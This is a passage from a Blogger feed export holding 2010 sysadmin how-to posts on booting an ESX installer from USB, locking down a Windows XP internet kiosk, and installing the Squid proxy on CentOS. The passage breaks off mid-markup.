'lucida grande', arial, helvetica, sans-serif; "&gt;append ks initrd=initrd.img usb&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;label lowres&lt;br /&gt;&lt;ul&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;kernel vmlinuz&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;append initrd=initrd.img lowres usb&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;Extract the syslinux.zip file into another temporary directory on your hard drive.&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;Open up a command prompt and navigate into the win32 directory. For example: C:\temp\syslinux-3.36\win32&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;Now, run the syslinux program to apply the boot loader and boot sector to the USB flash drive: syslinux -s –ma I:&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;Copy the ESX 3.x ISO image onto the USB drive root&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;Confirm that your USB flash drive contains the following files:&lt;br /&gt;&lt;ul&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;boot.cat&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;boot.msg&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;initrd.img&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;snake.msg&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;splash.lss&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;vmlinuz&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;syslinux.cfg&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;esx-X.iso&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;Your ready to go, ensure your bios on the server you want to install too is setup to boot from USB or select USB from the alternate boot menu.&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;The ESX installer will detect the USB device and whatever SCSI / disk controllers you have. When the installer asks you what the installation source will be, choose Hard Disk.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;You will need to choose the right disk device (ie. /dev/sda, /dev/sdb) that corresponds to your USB disk. Chances are it will be /dev/sdb.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li style="font: normal normal normal 10pt/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "&gt;Finally, the installer will ask you what directory to find the ESX installation CD image in. Just use / and it will find the .ISO image for you.&lt;/li&gt;&lt;/ol&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-15643783694767907?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/15643783694767907/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/connect-usb-drive-to-vmware-esx-server.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/15643783694767907'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/15643783694767907'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/connect-usb-drive-to-vmware-esx-server.html' title='Connect USB Drive to VMware ESX Server'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-3921197653976558675</id><published>2010-02-05T22:38:00.000-08:00</published><updated>2010-02-05T22:39:29.970-08:00</updated><title type='text'>How to Create an Internet Kiosk in 10 Easy Steps on Windows XP</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: 14px; color: rgb(51, 51, 51); line-height: 23px; "&gt;&lt;p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; "&gt;If you own a business and would like to provide an “Internet Cafe” to your customers but do not want to worry about them trashing your computer or snooping around your network, there are some things you can do to create a more secure environment. This secure internet browsing mode is commonly referred to as an Internet Kiosk.&lt;/p&gt;&lt;p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; "&gt;Disclaimer: This article is designed to cover most angles but does not claim to be conclusive in securing Windows (if there is such a thing!) What we will essentially do is create an automatically updating machine that grants the user access only to Internet Explorer by changing the shell value for that user and&lt;br /&gt;by applying local Group Policy to restrict the user.&lt;br /&gt;&lt;strong style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "&gt;&lt;br /&gt;Steps to Create Your Own Internet Kiosk:&lt;/strong&gt;&lt;/p&gt;&lt;ol style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 15px; margin-left: 40px; "&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Install Windows XP (Pro is recommended, but not required. This how-to is based on Pro edition) on a NTFS formatted hard drive.&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Install all updates via &lt;a href="http://windowsupdate.microsoft.com/" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 96, 255); text-decoration: underline; "&gt;windowsupdate.microsoft.com&lt;/a&gt; and set automatic updates to install automatically in the future on a daily basis&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Install your anti virus software of choice and set it to auto update&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Install Flash, Macromedia, and acrobat reader if you so choose&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;create a new user account with &lt;span style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-weight: bold; "&gt;admin&lt;/span&gt; privileges, set the password to never expire and to not be able to be changed by the user&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;log in with that user and make the following registry change:&lt;ul style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 5px; margin-right: 0px; margin-bottom: 5px; margin-left: 30px; list-style-type: square; "&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;click Start -&gt; Run and type regedit and click OK&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Once the Registry Editor opens, click File and Export… to create a backup of the registry (in case something goes wrong). Place this in the C:\Windows folder.&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows NT\Current&lt;br /&gt;Version\Winlogon&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Create a new string value called shell (Edit -&gt; New -&gt; String Value)&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;in the Data portion of this new string value type: C:\Program Files\Internet Explorer\IEXPLORE.EXE&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Close the Registry Editor and logout of Windows&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Log back in with your original admin account&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Reduce the privileges of the new user account you created earlier to &lt;span style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-weight: bold; "&gt;user&lt;/span&gt;&lt;/li&gt;&lt;li style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Click Start -&gt; Run -&gt; Type “&lt;span style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-weight: bold; "&gt;mmc&lt;/span&gt;” without the quotes. On the &lt;span style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-weight: bold; "&gt;File&lt;/span&gt; menu click “&lt;span style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-weight: bold; "&gt;Add/Remove Snap-in&lt;/span&gt;“. Click Add.&lt;br /&gt;Under &lt;strong style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "&gt;Available Stand-alone Snap-ins&lt;/strong&gt;, click &lt;strong style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "&gt;Group Policy&lt;/strong&gt;, and then click &lt;strong style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "&gt;Add&lt;/strong&gt;. This will open the Group Policy editor where you can limit user rights to your heart’s content. I would recommend dis-allowing control panel access, Active Desktop options, Task Manager from Ctrl-Alt-Del, and other obvious settings to ensure that your users can only&lt;br /&gt;do what you say.&lt;/li&gt;&lt;/ol&gt;&lt;p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; "&gt;There you have it, 10 easy steps to create your own secure Internet&lt;br /&gt;Kiosk. When your newly created restricted user logs in, they will only get an Internet Explorer window. No start menu or desktop options.&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-3921197653976558675?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/3921197653976558675/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/how-to-create-internet-kiosk-in-10-easy.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/3921197653976558675'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/3921197653976558675'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/how-to-create-internet-kiosk-in-10-easy.html' title='How to Create an Internet Kiosk in 10 Easy Steps on Windows XP'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-7939333563582248524</id><published>2010-02-05T22:36:00.000-08:00</published><updated>2010-02-05T22:37:21.464-08:00</updated><title type='text'>Install Squid Proxy Server on CentOS</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; font-size: 14px; color: rgb(17, 17, 17); line-height: 22px; "&gt;&lt;p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "&gt;Sure Squid server is a popular open source GPLd proxy and web cache. It has a variety of uses, from speeding up a web server by caching repeated requests, to caching web, name server query , and other network lookups for a group of people sharing network resources. It is primarily designed to run on Linux / Unix-like systems. Squid is a high-performance proxy caching server for Web clients, supporting FTP, gopher, and HTTP data objects. Unlike traditional caching software, Squid handles all requests in a single, non-blocking, I/O-driven process. Squid keeps meta data and especially hot objects cached in RAM, caches DNS lookups, supports non-blocking DNS lookups, and implements negative caching of failed requests. Squid consists of a main server program squid, a Domain Name System lookup program (dnsserver), a program for retrieving FTP data (ftpget), and some management and client tools.&lt;/p&gt;&lt;h2 style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 1.8em; font-weight: normal; line-height: 1.267em; "&gt;Install Squid on CentOS / RHEL 5&lt;/h2&gt;&lt;p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "&gt;Use yum command as follows:&lt;br /&gt;&lt;code style="padding-top: 0.615em; padding-right: 0.846em; padding-bottom: 0.615em; padding-left: 0.846em; margin-top: 0px; margin-right: 0px; margin-bottom: 1.692em; margin-left: 0px; font-family: Consolas, 'Andale Mono', Courier, 'Courier New'; line-height: 1.385em; background-image: none; background-repeat: repeat; background-attachment: scroll; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); font-size: 0.929em; display: block; overflow-x: auto; overflow-y: auto; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(221, 221, 221); border-right-color: rgb(221, 221, 221); border-bottom-color: rgb(221, 221, 221); border-left-color: rgb(221, 221, 221); background-position: 0px 0px; "&gt;# yum install squid&lt;/code&gt;&lt;br /&gt;Output:&lt;/p&gt;&lt;pre style="padding-top: 0.615em; padding-right: 0.846em; padding-bottom: 0.615em; padding-left: 0.846em; margin-top: 0px; margin-right: 0px; margin-bottom: 1.692em; margin-left: 0px; font-family: Consolas, 'Andale Mono', Courier, 'Courier New'; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(221, 221, 221); border-right-color: rgb(221, 221, 221); border-bottom-color: rgb(221, 221, 221); border-left-color: rgb(221, 221, 221); overflow-x: auto; overflow-y: auto; clear: both; font-size: 0.929em; line-height: 1.385em; background-position: initial initial; "&gt;Loading "installonlyn" plugin Setting up Install Process Setting up repositories Reading repository metadata in from local files Parsing package install arguments Resolving Dependencies --&gt; Populating transaction set with selected packages. Please wait. ---&gt; Package squid.i386 7:2.6.STABLE6-4.el5 set to be updated --&gt; Running transaction check  Dependencies Resolved  =============================================================================  Package                 Arch       Version          Repository        Size ============================================================================= Installing:  squid                   i386       7:2.6.STABLE6-4.el5  updates           1.2 M  Transaction Summary ============================================================================= Install      1 Package(s) Update       0 Package(s) Remove       0 Package(s)           Total download size: 1.2 M Is this ok [y/N]: y Downloading Packages: Running Transaction Test Finished Transaction Test Transaction Test Succeeded Running Transaction   Installing: squid                        ######################### [1/1]   Installed: squid.i386 7:2.6.STABLE6-4.el5 Complete!&lt;/pre&gt;&lt;h2 style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 1.8em; font-weight: normal; line-height: 1.267em; "&gt;Squid Basic Configuration&lt;/h2&gt;&lt;p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "&gt;Squid configuration file located at /etc/squid/squid.conf. Open file using a text editor:&lt;br /&gt;&lt;code style="padding-top: 0.615em; padding-right: 0.846em; padding-bottom: 0.615em; padding-left: 0.846em; margin-top: 0px; margin-right: 0px; margin-bottom: 1.692em; margin-left: 0px; font-family: Consolas, 'Andale Mono', Courier, 'Courier New'; line-height: 1.385em; background-image: none; background-repeat: repeat; background-attachment: scroll; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); font-size: 0.929em; display: block; overflow-x: auto; overflow-y: auto; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(221, 221, 221); border-right-color: rgb(221, 221, 221); border-bottom-color: rgb(221, 221, 221); border-left-color: rgb(221, 221, 221); background-position: 0px 0px; "&gt;# vi /etc/squid/squid.conf&lt;/code&gt;&lt;br /&gt;At least you need to define ACL (access control list) to work with squid. The defaults port is TCP 3128. Following example ACL allowing access from your local networks 192.168.1.0/24 and 192.168.2.0/24. Make sure you adapt to list your internal IP networks from where browsing should be allowed:&lt;br /&gt;&lt;code style="padding-top: 0.615em; padding-right: 0.846em; padding-bottom: 0.615em; padding-left: 0.846em; margin-top: 0px; margin-right: 0px; margin-bottom: 1.692em; margin-left: 0px; font-family: Consolas, 'Andale Mono', Courier, 'Courier New'; line-height: 1.385em; background-image: none; background-repeat: repeat; background-attachment: scroll; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); font-size: 0.929em; display: block; overflow-x: auto; overflow-y: auto; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(221, 221, 221); border-right-color: rgb(221, 221, 221); border-bottom-color: rgb(221, 221, 221); border-left-color: rgb(221, 221, 221); background-position: 0px 0px; "&gt;acl our_networks src 192.168.1.0/24 192.168.2.0/24&lt;br /&gt;http_access allow our_networks&lt;/code&gt;&lt;/p&gt;&lt;p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "&gt;Save and close the file. Start squid proxy server:&lt;br /&gt;&lt;code style="padding-top: 0.615em; padding-right: 0.846em; padding-bottom: 0.615em; padding-left: 0.846em; margin-top: 0px; margin-right: 0px; margin-bottom: 1.692em; margin-left: 0px; font-family: Consolas, 'Andale Mono', Courier, 'Courier New'; line-height: 1.385em; background-image: none; background-repeat: repeat; background-attachment: scroll; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); font-size: 0.929em; display: block; overflow-x: auto; overflow-y: auto; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(221, 221, 221); border-right-color: rgb(221, 221, 221); border-bottom-color: rgb(221, 221, 221); border-left-color: rgb(221, 221, 221); background-position: 0px 0px; "&gt;# chkconfig squid on&lt;br /&gt;# /etc/init.d/squid start&lt;/code&gt;&lt;br /&gt;Output:&lt;/p&gt;&lt;pre style="padding-top: 0.615em; padding-right: 0.846em; padding-bottom: 0.615em; padding-left: 0.846em; margin-top: 0px; margin-right: 0px; margin-bottom: 1.692em; margin-left: 0px; font-family: Consolas, 'Andale Mono', Courier, 'Courier New'; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(221, 221, 221); border-right-color: rgb(221, 221, 221); border-bottom-color: rgb(221, 221, 221); border-left-color: rgb(221, 221, 221); overflow-x: auto; overflow-y: auto; clear: both; font-size: 0.929em; line-height: 1.385em; background-position: initial initial; "&gt;init_cache_dir /var/spool/squid... Starting squid: .       [  OK  ]&lt;/pre&gt;&lt;p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "&gt;Verify port 3128 is open:&lt;br /&gt;&lt;code style="padding-top: 0.615em; padding-right: 0.846em; padding-bottom: 0.615em; padding-left: 0.846em; margin-top: 0px; margin-right: 0px; margin-bottom: 1.692em; margin-left: 0px; font-family: Consolas, 'Andale Mono', Courier, 'Courier New'; line-height: 1.385em; background-image: none; background-repeat: repeat; background-attachment: scroll; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); font-size: 0.929em; display: block; overflow-x: auto; overflow-y: auto; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(221, 221, 221); border-right-color: rgb(221, 221, 221); border-bottom-color: rgb(221, 221, 221); border-left-color: rgb(221, 221, 221); background-position: 0px 0px; "&gt;# netstat -tulpn | grep 3128&lt;/code&gt;&lt;br /&gt;Output:&lt;/p&gt;&lt;pre style="padding-top: 0.615em; padding-right: 0.846em; padding-bottom: 0.615em; padding-left: 0.846em; margin-top: 0px; margin-right: 0px; margin-bottom: 1.692em; margin-left: 0px; font-family: Consolas, 'Andale Mono', Courier, 'Courier New'; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(221, 221, 221); border-right-color: rgb(221, 221, 221); border-bottom-color: rgb(221, 221, 221); border-left-color: rgb(221, 221, 221); overflow-x: auto; overflow-y: auto; clear: both; font-size: 0.929em; line-height: 1.385em; background-position: initial initial; "&gt;tcp        0      0 0.0.0.0:&lt;span style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(255, 0, 0); "&gt;3128&lt;/span&gt;                0.0.0.0:*                   &lt;span style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(255, 0, 0); "&gt;LISTEN&lt;/span&gt;      20653/(squid)&lt;/pre&gt;&lt;h2 style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 1.8em; font-weight: normal; line-height: 1.267em; "&gt;Open TCP port 3128&lt;/h2&gt;&lt;p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "&gt;Finally make sure iptables is allowing to access squid proxy server. Just open /etc/sysconfig/iptables file:&lt;br /&gt;&lt;code style="padding-top: 0.615em; padding-right: 0.846em; padding-bottom: 0.615em; padding-left: 0.846em; margin-top: 0px; margin-right: 0px; margin-bottom: 1.692em; margin-left: 0px; font-family: Consolas, 'Andale Mono', Courier, 'Courier New'; line-height: 1.385em; background-image: none; background-repeat: repeat; background-attachment: scroll; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); font-size: 0.929em; display: block; overflow-x: auto; overflow-y: auto; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(221, 221, 221); border-right-color: rgb(221, 221, 221); border-bottom-color: rgb(221, 221, 221); border-left-color: rgb(221, 221, 221); background-position: 0px 0px; "&gt;# vi /etc/sysconfig/iptables&lt;/code&gt;&lt;br /&gt;Append configuration:&lt;br /&gt;&lt;code style="padding-top: 0.615em; padding-right: 0.846em; padding-bottom: 0.615em; padding-left: 0.846em; margin-top: 0px; margin-right: 0px; margin-bottom: 1.692em; margin-left: 0px; font-family: Consolas, 'Andale Mono', Courier, 'Courier New'; line-height: 1.385em; background-image: none; background-repeat: repeat; background-attachment: scroll; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); font-size: 0.929em; display: block; overflow-x: auto; overflow-y: auto; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(221, 221, 221); border-right-color: rgb(221, 221, 221); border-bottom-color: rgb(221, 221, 221); border-left-color: rgb(221, 221, 221); background-position: 0px 0px; "&gt;-A RH-Firewall-1-INPUT -m state --state NEW,ESTABLISHED,RELATED -m tcp -p tcp --dport 3128 -j ACCEPT&lt;/code&gt;&lt;br /&gt;Restart iptables based firewall:&lt;br /&gt;&lt;code style="padding-top: 0.615em; padding-right: 0.846em; padding-bottom: 0.615em; padding-left: 0.846em; margin-top: 0px; margin-right: 0px; margin-bottom: 1.692em; margin-left: 0px; font-family: Consolas, 'Andale Mono', Courier, 'Courier New'; line-height: 1.385em; background-image: none; background-repeat: repeat; background-attachment: scroll; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); font-size: 0.929em; display: block; overflow-x: auto; overflow-y: auto; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(221, 221, 221); border-right-color: rgb(221, 221, 221); border-bottom-color: rgb(221, 221, 221); border-left-color: rgb(221, 221, 221); background-position: 0px 0px; "&gt;# /etc/init.d/iptables restart&lt;/code&gt;&lt;br /&gt;Output:&lt;/p&gt;&lt;pre style="padding-top: 0.615em; padding-right: 0.846em; padding-bottom: 0.615em; padding-left: 0.846em; margin-top: 0px; margin-right: 0px; margin-bottom: 1.692em; margin-left: 0px; font-family: Consolas, 'Andale Mono', Courier, 'Courier New'; background-image: initial; background-repeat: initial; background-attachment: initial; 